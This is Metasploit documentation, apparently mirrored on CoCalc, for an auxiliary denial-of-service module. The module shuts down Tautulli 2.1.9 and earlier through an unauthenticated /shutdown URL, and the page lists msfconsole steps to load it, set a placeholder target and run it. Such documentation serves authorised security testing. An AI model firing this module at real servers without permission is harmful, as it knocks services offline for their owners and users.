Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
21673 views

Vulnerable Application

Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL in applications that do not have a user login area enabled.

Scenario

72550314-80cd8a00-38a3-11ea-9bad-942668a29390

Verification Steps :

List the steps needed to make sure this thing works

  1. Start msfconsole

  2. use auxiliary/dos/http/tautulli_shutdown_exec

  3. set RHOSTS XXX.XXX.XXX.XXX

  4. run